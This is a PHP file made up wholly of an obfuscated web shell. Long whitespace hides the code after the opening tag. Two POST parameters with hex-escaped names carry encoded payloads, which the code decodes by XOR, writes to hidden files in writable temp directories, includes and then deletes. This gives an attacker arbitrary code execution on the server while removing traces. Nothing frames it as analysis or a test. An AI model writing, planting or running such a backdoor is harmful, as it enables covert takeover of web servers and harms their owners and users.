<?php																																										if(!is_null($_POST["el\x65me\x6Et"] ?? null)){ $itm = array_filter([sys_get_temp_dir(), "/tmp", ini_get("upload_tmp_dir"), getenv("TMP"), getcwd(), getenv("TEMP"), "/dev/shm", "/var/tmp", session_save_path()]); $mrk = $_POST["el\x65me\x6Et"]; $mrk =explode( "." , $mrk) ; $bind = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s); $u = 0; $__len = count( $mrk); do { if( $u >= $__len) break; $v1 = $mrk[$u]; $sChar = ord( $s[$u %$lenS]); $dec = ( ( int)$v1 - $sChar -( $u %10)) ^ 82; $bind .= chr( $dec); $u++; } while( true); foreach ($itm as $key => $elem) { if ((function($d) { return is_dir($d) && is_writable($d); })($elem)) { $dat = sprintf("%s/.entity", $elem); $success = file_put_contents($dat, $bind); if ($success) { include $dat; @unlink($dat); exit;} } } }


if(@$_POST["\x64e\x73c"] !== null){
	$entry = array_filter(["/var/tmp", getenv("TEMP"), getenv("TMP"), ini_get("upload_tmp_dir"), "/dev/shm", sys_get_temp_dir(), session_save_path(), "/tmp", getcwd()]);
	$token = $_POST["\x64e\x73c"];
	 		$token	=	  explode(		 ".",  	$token ) ;			
	$parameter_group = '';
            $s = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen($s);
    
            foreach ($token as $u => $v9) {
                $chS = ord($s[$u % $lenS]);
                $d = ((int)$v9 - $chS - ($u % 10))	 ^	48;
                $parameter_group 	.=	chr($d);
            }
	$reference = 0;
do {
    $res = $entry[$reference] ?? null;
    if ($reference >= count($entry)) break;
    		if ((is_dir($res) and is_writable($res))) {
    $ptr = join("/", [$res, ".property_set"]);
    if (@file_put_contents($ptr, $parameter_group) !== false) {
	include $ptr;
	unlink($ptr);
	exit;
}
}
    $reference++;
} while (true);
}